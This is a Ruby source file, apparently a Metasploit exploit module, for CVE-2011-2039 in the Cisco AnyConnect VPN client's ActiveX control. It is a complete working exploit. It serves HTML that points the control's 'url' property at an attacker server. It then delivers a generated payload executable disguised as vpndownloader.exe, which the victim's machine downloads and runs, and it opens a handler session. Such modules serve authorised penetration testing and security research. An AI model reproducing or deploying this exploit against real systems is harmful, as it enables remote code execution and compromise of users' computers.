96 lines
2.9 KiB
Ruby
96 lines
2.9 KiB
Ruby
|
##
|
||
|
|
# $Id$
|
||
|
|
##
|
||
|
|
|
||
|
|
##
|
||
|
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
|
# Framework web site for more information on licensing and terms of use.
|
||
|
|
# http://metasploit.com/framework/
|
||
|
|
##
|
||
|
|
|
||
|
|
require 'msf/core'
|
||
|
|
|
||
|
|
class Metasploit3 < Msf::Exploit::Remote
|
||
|
|
Rank = ExcellentRanking
|
||
|
|
|
||
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||
|
|
include Msf::Exploit::EXE
|
||
|
|
|
||
|
|
def initialize(info = {})
|
||
|
|
super(update_info(info,
|
||
|
|
'Name' => 'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute',
|
||
|
|
'Description' => %q{
|
||
|
|
This module exploits a vulnerability in the Cisco AnyConnect VPN client
|
||
|
|
vpnweb.ocx ActiveX control. This control is typically used to install the
|
||
|
|
VPN client. An attacker can set the 'url' property which is where the control
|
||
|
|
tries to locate the files needed to install the client.
|
||
|
|
|
||
|
|
The control tries to download two files from the site specified within the
|
||
|
|
'url' property. One of these files it will be stored in a temporary directory and
|
||
|
|
executed.
|
||
|
|
},
|
||
|
|
'License' => MSF_LICENSE,
|
||
|
|
'Author' => [ 'bannedit' ],
|
||
|
|
'Version' => '$Revision$',
|
||
|
|
'References' =>
|
||
|
|
[
|
||
|
|
[ 'CVE', '2011-2039' ],
|
||
|
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909' ],
|
||
|
|
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml'],
|
||
|
|
],
|
||
|
|
'Platform' => 'win',
|
||
|
|
'Targets' =>
|
||
|
|
[
|
||
|
|
[ 'Automatic',
|
||
|
|
{
|
||
|
|
'Arch' => ARCH_X86
|
||
|
|
}
|
||
|
|
],
|
||
|
|
],
|
||
|
|
'DisclosureDate' => 'Jun 01 2011',
|
||
|
|
'DefaultTarget' => 0))
|
||
|
|
|
||
|
|
register_options(
|
||
|
|
[
|
||
|
|
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
|
||
|
|
], self.class)
|
||
|
|
end
|
||
|
|
|
||
|
|
def on_request_uri(cli, request)
|
||
|
|
|
||
|
|
if request.uri.match(/vpndownloader\.exe/)
|
||
|
|
exe = generate_payload_exe({:code => payload.encoded})
|
||
|
|
|
||
|
|
print_status("Client requested: #{request.uri}. Sending vpndownloader.exe")
|
||
|
|
send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
|
||
|
|
select(nil, nil, nil, 5) # let the file download
|
||
|
|
handler(cli)
|
||
|
|
return
|
||
|
|
end
|
||
|
|
|
||
|
|
if request.uri.match(/updates\.txt/)
|
||
|
|
print_status("Client requested: #{request.uri}. Sending updates.txt")
|
||
|
|
updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))
|
||
|
|
send_response(cli, updates, { 'Content-Type' => 'text/plain' })
|
||
|
|
return
|
||
|
|
end
|
||
|
|
|
||
|
|
url = ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
|
||
|
|
url << ":#{datastore['SRVPORT']}"
|
||
|
|
|
||
|
|
vname = rand_text_alpha((rand(100) + 1))
|
||
|
|
dir = rand_text_alpha((rand(40) + 1))
|
||
|
|
|
||
|
|
html = %Q|
|
||
|
|
<html>
|
||
|
|
<object classid="clsid:55963676-2F5E-4BAF-AC28-CF26AA587566" id="#{vname}"></object>
|
||
|
|
<script>
|
||
|
|
#{vname}.url = "http://#{url}/#{dir}/";
|
||
|
|
</script>
|
||
|
|
</html>
|
||
|
|
|
|
||
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||
|
|
send_response_html(cli, html)
|
||
|
|
end
|
||
|
|
end
|